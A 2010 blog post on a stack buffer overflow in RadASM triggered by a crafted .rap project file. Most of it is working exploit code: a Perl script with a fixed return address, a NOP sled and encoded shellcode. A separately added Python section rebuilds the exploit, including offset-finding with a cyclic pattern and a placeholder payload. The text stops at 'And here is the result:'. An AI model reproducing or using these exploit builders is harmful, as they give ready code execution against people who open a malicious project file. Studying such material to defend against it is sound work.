
Thursday, February 11, 2010

RadASM .rap Stack Buffer Overflow

Hey guys,
While I was checking for new vulnerabilities, I came across an exploit for a program named RadASM, which suffers from a stack buffer overflow when it opens a malicious .rap project file that carries the right header and the right end-header (as I call it).
Here is the original exploit: http://www.exploit-db.com/exploits/11400 (it was not discovered by me but by Dz_attacker, so all credit goes to him!)
After a bit of fuzzing I noticed that the header was:
[Project]
Assembler=masm
Group=1
GroupExpand=1
[Files]
1=AVP [JUNK-STUFF AREA]
And the end-header was:
2=AVP Over.Inc
[MakeFiles]
0=AVP Over.res
[MakeDef]
Menu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1
2=3,O,$B\ML.EXE /c /coff /Cp /no6Cogo /I"$I",2
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res
6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm
7=0,0,"$E\OllyDbg",5
[Group]
Group=Added files,Assembly,Resources,Misc,Modules
1=1
Well, I first tried simply copying and pasting the header and the end-header into my script with the shellcode in the middle, and the same thing happened (PWNED!).
But Dz_attacker did the right thing by converting the header and the end-header into hex-escaped bytes, because anyone who pastes them into a Perl double-quoted string as I did has to take care of some important details, such as putting a backslash before every " (so it becomes \") and before every backslash (so it becomes \\). The $B, $I, $L, $5 and $E tokens in the [MakeDef] lines also have to be escaped as \$B and so on, otherwise Perl interpolates them as (empty) variables and the file you write no longer matches the header the program expects.
That was boring and long but interesting (at least for me :P)!
And here is my vulnerability script, written in Perl:
#!/usr/bin/perl -w
use strict;

# Output file: a .rap project that overflows the first [Files] entry.
my $file="Crash.rap";

# Header taken from the fuzzing above; the junk goes right after "1=AVP ".
my $header="[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1=AVP ";

# End-header. Every ", \ and $ is escaped so the file contains the literal
# $B\RC.EXE, /I"$I", etc. instead of interpolated (empty) Perl variables.
my $end="\n2=AVP Over.Inc\n[MakeFiles]\n0=AVP Over.res\n[MakeDef]\nMenu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0\n1=4,O,\$B\\RC.EXE /v,1\n2=3,O,\$B\\ML.EXE /c /coff /Cp /no6Cogo /I\"\$I\",2\n3=5,O,\$B\\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:\"\$L\" /OUT:\"\$5\",3\n4=0,0,,5\n5=rsrc.obj,O,\$B\\CVTRES.EXE,rsrc.res\n6=*.obj,O,\$B\\ML.EXE /c /coff /Cp /nologo /I\"\$I\",*.asm\n7=0,0,\"\$E\\OllyDbg\",5\n[Group]\nGroup=Added files,Assembly,Resources,Misc,Modules\n1=1";

my $junk="A"x257;                    # bytes before the saved return address
my $eip=pack('V',0x7E4456F7);        # 0x7E4456F7 from USER32.dll (little-endian; OS/SP specific) <<<<< !!!
my $presc="SEXYSEXYSEXY";            # 12 bytes of padding before the NOP sled
my $esp="\x90"x20;                   # NOP sled, followed by the encoded shellcode
$esp=$esp."\xd9\xc5\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x11\xba\x83\x9b" .
"\x0c\x12\x31\x57\x18\x03\x57\x18\x83\xc7\x87\x79\xf9\x7a" .
"\xc3\x5d\x22\x7b\xa3\xcd\x75\x35\x76\x86\x14\xe9\x55\x76" .
"\x8f\xc9\xf1\x13\x2e\x62\x8b\xb2\xc4\x0b\x03\x16\x40\x8f" .
"\xa6\xf0\xe6\x2e\x26\x21\x9f\xf3\xd9\x53\x3a\x7d\xc3\xa5" .
"\x1f\x2e\x5d\x90\xcc\x6a\x8d\x1b\xb6\xf2\xb2\xf7\x09\xd0" .
"\x1f\x43\x7b\x2d\x1e\xcf\x83\x62";

open(INI,">$file") or die "cannot write $file: $!";
binmode(INI);                        # keep \n as \n on Windows so the offsets stay exact
print INI $header.$junk.$eip.$presc.$esp.$end;
close(INI);
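As an added example (my own code, not the post's script and not anything from RadASM), here is a Python version of the same builder that also covers the fuzzing step the post only mentions in passing: it writes a first .rap whose [Files] entry is a cyclic pattern, so the four bytes that land in EIP at the crash give away the overwrite offset (257 here), and then builds the crash file with the post's layout (junk, return address, pad, NOP sled, payload). The header and end-header are the ones quoted above, kept as literals so no escaping is needed; the return address is the post's 0x7E4456F7; the INT3 payload is a constructed stand-in for the encoded shellcode and is the only part not taken from the post.

```python
#!/usr/bin/env python3
"""Builder for the RadASM .rap overflow layout described in the post.

Added example, not the original Perl script.  Header and trailer are the ones
quoted in the post; the payload is a constructed stand-in (see SHELLCODE).
"""
import struct

# Project header copied from the post.  The junk goes straight after "1=AVP ",
# so the overflowing field is the first [Files] entry.
RAP_HEADER = (b"[Project]\n"
              b"Assembler=masm\n"
              b"Group=1\n"
              b"GroupExpand=1\n"
              b"[Files]\n"
              b"1=AVP ")

# End-header copied from the post (including the odd /no6Cogo switch exactly as
# shown there), as a raw bytes literal: "$B", "$I", "$5" and the single
# backslashes survive as-is, which is what the Perl double-quoted string
# gets wrong when $B & co. are left unescaped.
RAP_TRAILER = rb"""
2=AVP Over.Inc
[MakeFiles]
0=AVP Over.res
[MakeDef]
Menu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1
2=3,O,$B\ML.EXE /c /coff /Cp /no6Cogo /I"$I",2
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res
6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm
7=0,0,"$E\OllyDbg",5
[Group]
Group=Added files,Assembly,Resources,Misc,Modules
1=1"""

RET_ADDR = 0x7E4456F7    # address used in the post (USER32.dll on its box)
JUNK_LEN = 257           # bytes before the saved return address, from the post
PAD = b"SEXYSEXYSEXY"    # 12 bytes between the return address and the NOP sled

# Constructed stand-in payload: 20 NOPs then INT3 breakpoints, so a successful
# redirect shows up as a breakpoint exception in the debugger.  Swap in the
# post's encoded shellcode for a real run.
SHELLCODE = b"\x90" * 20 + b"\xcc" * 32


def cyclic_pattern(length):
    """Metasploit-style pattern: every 4-byte window is unique for 20280 bytes."""
    out = bytearray()
    for a in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for b in b"abcdefghijklmnopqrstuvwxyz":
            for c in b"0123456789":
                out += bytes((a, b, c))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, eip_value):
    """Offset in the pattern of the 4 bytes that landed in EIP (-1 if absent).

    eip_value is the register as read in the debugger, so it is packed
    little-endian before searching, the same way pack('V', ...) writes it.
    """
    return pattern.find(struct.pack("<I", eip_value))


def fuzz_rap(pattern_length=400):
    """Stage 1: a .rap whose [Files] entry is a cyclic pattern, to find the offset."""
    return RAP_HEADER + cyclic_pattern(pattern_length) + RAP_TRAILER


def crash_rap(ret_addr=RET_ADDR, junk_len=JUNK_LEN, payload=SHELLCODE):
    """Stage 2: the post's layout: junk, return address, pad, NOPs + payload."""
    return (RAP_HEADER + b"A" * junk_len + struct.pack("<I", ret_addr)
            + PAD + payload + RAP_TRAILER)


def ret_offset(rap, ret_addr=RET_ADDR):
    """File offset of the packed return address, as a sanity check of the layout."""
    return rap.find(struct.pack("<I", ret_addr))


def write_rap(path, data):
    # Binary mode: a text-mode handle on Windows would turn \n into \r\n and
    # shift every offset after the header.
    with open(path, "wb") as fh:
        fh.write(data)


if __name__ == "__main__":
    write_rap("Fuzz.rap", fuzz_rap())
    rap = crash_rap()
    write_rap("Crash.rap", rap)
    print("return address sits at file offset", ret_offset(rap))
```

Open Fuzz.rap in RadASM under a debugger first, read EIP at the access violation, and feed that value to pattern_offset(); with the post's numbers it comes back as 257, which is the junk length crash_rap() then uses.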

And here is the result:
